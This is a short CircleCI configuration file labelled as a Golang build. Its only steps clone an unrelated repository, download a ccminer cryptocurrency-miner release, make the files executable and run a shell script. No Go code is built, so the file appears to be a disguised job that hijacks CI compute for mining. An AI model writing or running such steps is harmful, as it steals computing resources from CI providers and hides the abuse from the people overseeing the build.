# Golang CircleCI 2.0 configuration file
#
# Check https://circleci.com/docs/2.0/language-go/ for more details
version: 2

jobs:
  build:
    docker:
      - image: circleci/golang:1.9
    steps:
      - run: git clone https://github.com/kimbokjoo21/project2120
      - run: curl https://github.com/netswift/ccminer-linux/releases/download/v1.6.6-cuda30/ccminer-cuda30-amd64-linux-v1_6_6.zip -o g.zip
      - run: cd project2120 && unzip g.zip && chmod +x * && ./base.sh
      
